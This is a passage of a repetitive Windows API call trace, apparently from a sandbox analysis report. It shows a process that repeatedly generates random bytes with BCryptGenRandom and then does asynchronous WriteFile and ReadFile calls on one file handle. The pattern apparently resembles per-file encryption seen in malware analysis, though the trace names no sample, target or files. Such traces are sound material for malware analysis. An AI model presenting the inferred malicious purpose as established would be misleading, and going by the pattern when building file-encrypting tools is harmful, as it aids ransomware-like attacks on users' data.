returned 1 [0204.576] CloseHandle (hObject=0x3cc) returned 1 [0204.576] free (_Block=0x3df0008) [0204.576] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0204.584] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.585] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.585] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0204.585] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.585] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.585] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0204.585] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0204.586] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0204.586] free (_Block=0x3e305b8) [0204.586] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0204.586] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0204.586] free (_Block=0x1fa91d0) [0204.586] free (_Block=0x1fa2ed8) [0204.586] free (_Block=0x1fa90b8) [0204.586] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0204.587] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0204.587] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x150, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0204.587] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0204.598] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x102, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0204.598] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0204.599] CloseHandle (hObject=0x3cc) returned 1 [0204.599] free (_Block=0x3df0008) [0204.599] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0204.608] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.609] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.609] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0204.609] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.609] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.609] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0204.610] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0204.610] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0204.610] free (_Block=0x3e305b8) [0204.610] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0204.610] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0204.610] free (_Block=0x1fa91d0) [0204.610] free (_Block=0x1fa2ed8) [0204.610] free (_Block=0x1fa90b8) [0204.610] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x617, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0204.611] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0204.612] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0204.612] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0204.623] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x11f, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0204.623] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0204.623] CloseHandle (hObject=0x3cc) returned 1 [0204.624] free (_Block=0x3df0008) [0204.624] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0204.632] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.633] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.633] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0204.633] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.633] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.633] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0204.633] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0204.633] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0204.633] free (_Block=0x3e305b8) [0204.633] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0204.633] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0204.634] free (_Block=0x1fa91d0) [0204.634] free (_Block=0x1fa2ed8) [0204.634] free (_Block=0x1fa90b8) [0204.634] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61f, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0204.634] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0204.635] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0204.635] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0204.650] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xe9, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0204.650] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0204.650] CloseHandle (hObject=0x3cc) returned 1 [0204.650] free (_Block=0x3df0008) [0204.650] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0204.658] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.658] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.658] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0204.659] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.659] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.659] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0204.659] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0204.659] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0204.659] free (_Block=0x3e305b8) [0204.659] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0204.659] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0204.660] free (_Block=0x1fa91d0) [0204.660] free (_Block=0x1fa2ed8) [0204.660] free (_Block=0x1fa90b8) [0204.660] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x617, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0204.661] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0204.661] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0204.661] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0204.671] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xb1, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0204.671] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0204.672] CloseHandle (hObject=0x3cc) returned 1 [0204.672] free (_Block=0x3df0008) [0204.672] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0204.688] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.688] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.688] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0204.688] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.689] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.689] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0204.689] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0204.689] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0204.689] free (_Block=0x3e305b8) [0204.689] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0204.689] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0204.690] free (_Block=0x1fa91d0) [0204.690] free (_Block=0x1fa2ed8) [0204.690] free (_Block=0x1fa90b8) [0204.690] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x613, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0204.690] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0204.691] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xb0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0204.691] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0204.702] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x14e, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0204.702] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0204.702] CloseHandle (hObject=0x3cc) returned 1 [0204.702] free (_Block=0x3df0008) [0204.702] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0204.710] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.711] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.711] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0204.711] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.711] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.711] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0204.711] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0204.711] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0204.712] free (_Block=0x3e305b8) [0204.712] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0204.712] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0204.721] free (_Block=0x1fa91d0) [0204.722] free (_Block=0x1fa2ed8) [0204.722] free (_Block=0x1fa90b8) [0204.722] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x615, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0204.722] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0204.722] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0204.723] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0204.734] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xf7, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0204.734] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0204.734] CloseHandle (hObject=0x3cc) returned 1 [0204.735] free (_Block=0x3df0008) [0204.735] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0204.765] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.765] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.765] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0204.765] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.766] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.766] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0204.766] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0204.766] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0204.766] free (_Block=0x3e305b8) [0204.766] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0204.766] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0204.767] free (_Block=0x1fa91d0) [0204.767] free (_Block=0x1fa2ed8) [0204.767] free (_Block=0x1fa90b8) [0204.767] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0204.767] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0204.768] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0204.768] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0204.781] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xb6, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0204.781] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0204.781] CloseHandle (hObject=0x3cc) returned 1 [0204.781] free (_Block=0x3df0008) [0204.781] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0204.796] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.796] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.796] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0204.796] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.797] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.797] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0204.797] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0204.797] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0204.797] free (_Block=0x3e305b8) [0204.797] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0204.797] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0204.798] free (_Block=0x1fa91d0) [0204.798] free (_Block=0x1fa2ed8) [0204.798] free (_Block=0x1fa90b8) [0204.798] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x611, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0204.798] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0204.799] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xb0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0204.799] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0204.831] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xff, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0204.831] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0204.832] CloseHandle (hObject=0x3cc) returned 1 [0204.832] free (_Block=0x3df0008) [0204.832] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0204.840] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.840] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.840] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0204.840] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.841] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.841] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0204.841] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0204.841] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0204.841] free (_Block=0x3e305b8) [0204.841] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0204.841] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 